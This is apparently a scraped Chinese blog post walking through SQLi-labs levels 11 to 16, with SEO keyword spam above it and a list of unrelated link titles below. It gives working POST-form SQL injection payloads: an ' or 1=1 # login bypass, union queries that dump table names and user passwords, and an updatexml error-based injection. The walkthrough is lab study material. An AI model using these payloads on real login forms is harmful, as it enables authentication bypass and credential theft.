当前位置: 首页 > wzjs >正文

商城网站要怎样设计北京seo学校

商城网站要怎样设计,北京seo学校,宝塔建设的网站火车头发布失败,东莞公司注册登记第11关 POST请求联合注入一、审题这一关开始变成了登录框输入,也就是post请求的表单提交。前十关都是get请求方式,可以直接在url栏中注入,这里的注入点换成了登录框。二、思考这里输入1会显示报错,可以判断出是单引号闭合。我们仔…

第11关 POST请求联合注入

一、审题

这一关开始变成了登录框输入,也就是post请求的表单提交。前十关都是get请求方式,可以直接在url栏中注入,这里的注入点换成了登录框。

二、思考

 这里输入1'会显示报错,可以判断出是单引号闭合。

我们仔细观察报错信息,MySQL 指出错误发生在查询的 '1'' and password='' LIMIT 0,1 部分附近,那么来推测一下原始的查询语句,可能是:

SELECT * FROM users WHERE username = '$uname' and password = '$passwd' LIMIT 0,1

假设在username框中输入1' or 1=1 #来尝试把后面的密码验证注释掉,看看是否能登录成功。

这里使用#注释符是因为post请求会完整传输,无需编码处理。

可以看到这里绕过密码,登录成功,页面显示了用户名和密码。

接下来尝试用联合注入获取更多数据。

三、做法

1.获取数据库名;

-1' union select 1,database()#

2.获取表名;

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

3.获取字段名;

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

4.获取字段数据。

-1' union select 1,group_concat(username,'~',password) from users#

第12关 ")闭合的联合注入

第13关  ')闭合的报错注入

这里登录成功没有回显位,但是登录失败会有报错信息。可以使用之前学过的报错注入。

-1') and updatexml(1,concat(0x7e,(select database())),3)#

第14关 双引号闭合的报错注入

第15关 单引号闭合的布尔盲注

只有正确和错误两种页面回显,可以使用布尔盲注。

第16关 ")闭合的布尔盲注

这几关都是通过POST请求的方式注入,把前面的联合注入,报错注入,布尔盲注又复习了一遍。

http://www.dtcms.com/wzjs/418828.html

相关文章:

  • 做报告的网站游戏广告投放平台
  • 医疗器械网上采购平台网站排名优化首页
  • 网站建设应计入哪个会计科目seo网站推广简历
  • 展示型网站源码查网站
  • 手机软件网站怎么自己创建网址
  • 莱芜正规的企业建站公司网站关键词上首页
  • 做网站还挣钱吗企业如何做网站
  • 北京各大网站推广服务公司重庆最新数据消息
  • 怎么查看一个网站是哪家公司做的站长工具ip地址
  • 做B2B网站需要办理什么南宁网站建设网络公司
  • 北京城乡建设和住房门户网站公司建网站流程
  • 网站导航条内容百度seo推广
  • 做旅行社的都是在哪网站拿票电商培训基地
  • 网站浮动qq客服代码seo承诺排名的公司
  • wordpress快速仿站教程宁德市地图
  • 建设部网站规范下载软文发布平台哪个好
  • 模板建站优点权威发布
  • 公司网站建设开题报告it培训机构口碑排名
  • 廊坊做网站多少钱外贸建站推广公司
  • wordpress 淘宝客模板长沙网站seo收费
  • 专做实习生招聘的网站全网营销系统是干什么的
  • 网站怎么自适应屏幕鹤壁网络推广哪家好
  • 如何在自己的网站上做h5页面百度竞价关键词优化
  • 主机托管公司苹果aso优化
  • 阿里巴巴网站详情页怎么做百度预测大数据官网
  • 室内装饰设计师seo培训网的优点是
  • 公司网站赏析网站推广排名哪家公司好
  • 医院网站制作公司一句吸引人的广告语
  • 网站免费做app网络推广公司排行榜
  • ip网站怎么做百度关键词分析